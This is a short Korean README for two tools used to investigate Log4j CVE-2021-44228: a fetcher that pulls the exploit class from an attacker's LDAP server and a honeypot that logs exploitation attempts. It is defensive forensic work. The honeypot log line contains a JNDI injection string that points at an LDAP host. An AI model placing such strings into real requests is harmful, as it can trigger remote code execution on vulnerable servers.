
Log4j CVE-2021-44228 조사를 위한 도구
Log4j CVE-2021-44228 조사를 위한 도구
https://www.youtube.com/watch?v=0-abhd-CLwQ
요구 사항: curl (시스템), requests (파이썬)
예제 명령:
python FetchPayload.py ldap://maliciouserver:1337/path
[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_
요구 사항: python3, asyncore
예제 명령:
python3 SimpleHoneypot.py
[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1